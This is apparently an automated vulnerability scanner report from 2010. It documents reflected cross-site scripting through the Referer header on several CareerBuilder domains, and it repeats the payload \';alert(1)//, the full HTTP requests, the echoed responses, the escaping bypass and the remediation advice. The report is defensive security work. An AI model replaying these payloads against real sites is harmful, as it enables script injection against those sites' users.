Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:37 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR14
Date: Sun, 14 Nov 2010 22:32:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 27a8f\\';alert(1)//6e670ded9a4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7decc\'%3balert(1)//b5c1d35e6b6 was submitted in the Referer HTTP header. This input was echoed as 7decc\\';alert(1)//b5c1d35e6b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7decc\'%3balert(1)//b5c1d35e6b6
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41396
Content-Type: text/html; charset=UTF-8
Content-Language: nl-BE
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=076fae62ecd844ab83cbd15796e732e6-343074658-RT-4; domain=.careerbuilder.be; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650D6BAB25334AC648C946D2BECF3CECF422BDDE4F98E7593E9FB2A73D1D7A21867DD45D8900D29A64F; domain=.careerbuilder.be; expires=Mon, 14-Nov-2011 23:30:58 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL29
Date: Sun, 14 Nov 2010 23:30:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="nl-BE" lang="nl-BE"> <head><title> Belgis ...[SNIP]... rbuilder.be'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7decc\\';alert(1)//b5c1d35e6b6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a991a\'%3balert(1)//5f33983e9f6 was submitted in the Referer HTTP header. This input was echoed as a991a\\';alert(1)//5f33983e9f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a991a\'%3balert(1)//5f33983e9f6
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52295
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=09b4107f91f64a6bb35b6f2e334f9ec1-343074617-R2-4; domain=.careerbuilder.ca; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6509424A7CD9CD907F95A20CC91B66835FF3627FFD79F20E005CD7BFE98FE7B12DBD69F5E53AB6E8F75; domain=.careerbuilder.ca; expires=Mon, 14-Nov-2011 23:30:16 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.ca; expires=Sun, 14-Nov-2010 23:45:17 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL2
Date: Sun, 14 Nov 2010 23:30:16 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Career ...[SNIP]... s_cb.prop1='CA Home Page'; s_cb.eVar8='JS_Home - CA Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a991a\\';alert(1)//5f33983e9f6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddaa2\'%3balert(1)//f383e007944 was submitted in the Referer HTTP header. This input was echoed as ddaa2\\';alert(1)//f383e007944 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ddaa2\'%3balert(1)//f383e007944
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56945
Content-Type: text/html; charset=UTF-8
Content-Language: de
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=211289f2c8a647beb5925d7b23171cfe-343074637-wg-6; domain=.careerbuilder.ch; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65020CFC40F9477B2A12DE11369EB093F6A65742E17DA3B7750224503A170F1D2F1699D9D43299CC627; domain=.careerbuilder.ch; expires=Mon, 14-Nov-2011 23:30:36 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 14 Nov 2010 23:30:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="de" lang="de"> <head><title> Jobs, Stelle ...[SNIP]... w.careerbuilder.ch'; s_cb.eVar8='www.careerbuilder.ch/CH/Default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ddaa2\\';alert(1)//f383e007944'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb19e\'%3balert(1)//bcd2ccde6ec was submitted in the Referer HTTP header. This input was echoed as cb19e\\';alert(1)//bcd2ccde6ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.co.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cb19e\'%3balert(1)//bcd2ccde6ec
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48960
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=6b9587ed92dc413eaa4742ff5e63d607-343074622-RO-4; domain=.careerbuilder.co.in; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650BEE444AA1C62206A582106BF6EDFFAA27F13B4C4277B0E59C1A5B416853CAAD126244A1C796639F5; domain=.careerbuilder.co.in; expires=Mon, 14-Nov-2011 23:30:21 GMT; path=/; HttpOnly
Set-Cookie: CB%5FSID=a22a4459be5947d98004b3d1664aa504-343074622-RO-4; domain=.careerbuilder.co.in; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:45:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL24
Date: Sun, 14 Nov 2010 23:30:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Jobs, ...[SNIP]... s_cb.prop1='IN Home Page'; s_cb.eVar8='JS_Home - IN Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cb19e\\';alert(1)//bcd2ccde6ec'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bea49\'%3balert(1)//10979b37ff was submitted in the Referer HTTP header. This input was echoed as bea49\\';alert(1)//10979b37ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bea49\'%3balert(1)//10979b37ff
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64658
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f43c203601c14c09849a0882f1e9af4e-343074622-R9-4; domain=.careerbuilder.co.uk; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650EC9D4330A539B7B4FC577CE6BC60CD68ACA6056B03B7E1DC7C0DEEB82BE26BD5F763376EB3A27830; domain=.careerbuilder.co.uk; expires=Mon, 14-Nov-2011 23:30:21 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.co.uk; expires=Sun, 14-Nov-2010 23:45:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 23:30:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Jobs. ...[SNIP]... ilder.co.uk'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bea49\\';alert(1)//10979b37ff'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41a66\'%3balert(1)//3658fefac7d was submitted in the Referer HTTP header. This input was echoed as 41a66\\';alert(1)//3658fefac7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mh&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=41a66\'%3balert(1)//3658fefac7d
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47571
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=60103a40306245c9b1dc5dae6b3ca5c4-343071331-XE-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B96361D5E49198BF48A659257B11385CC55216DE07B6CDCEE18499E25441F116329CE0A351F0E8D3; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:30 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR45
Date: Sun, 14 Nov 2010 22:35:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 41a66\\';alert(1)//3658fefac7d'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d210\'%3balert(1)//e1abceceacf was submitted in the Referer HTTP header. This input was echoed as 7d210\\';alert(1)//e1abceceacf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7d210\'%3balert(1)//e1abceceacf
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47476
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=95e8420371d1452bba994be4d14c4eb5-343071293-wv-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6504AB6FB350B35C1EE0DBAE9BC1201874E308B228A8FA0DAC66A07C247486E660367E6F80633C6DA49; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 22:34:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7d210\\';alert(1)//e1abceceacf'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d515b\'%3balert(1)//6da5c645183 was submitted in the Referer HTTP header. This input was echoed as d515b\\';alert(1)//6da5c645183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Default.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d515b\'%3balert(1)//6da5c645183
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47500
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=7134646562174cc3b821920eccff1375-343071267-wf-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65016B3D918466049B46A0200D7EFE04BE9BE4588459BE37D8DD8CEDFE0899541EA19AFF8376FCD4E66; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:26 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR16
Date: Sun, 14 Nov 2010 22:34:26 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - d515b\\';alert(1)//6da5c645183'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54339\'%3balert(1)//3177172343f was submitted in the Referer HTTP header. This input was echoed as 54339\\';alert(1)//3177172343f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Default.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=54339\'%3balert(1)//3177172343f
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47550
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=7979d6ddf5214c728b6897911daf0e7e-343071180-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B4EA5019EC41A81277E3289EAD06697DF018AAA532CCFC5E2C01E326E350DC0F80988FB4E11DAA74; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:00 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:33:00 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 54339\\';alert(1)//3177172343f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 816d3\'%3balert(1)//0cc15065b6 was submitted in the Referer HTTP header. This input was echoed as 816d3\\';alert(1)//0cc15065b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
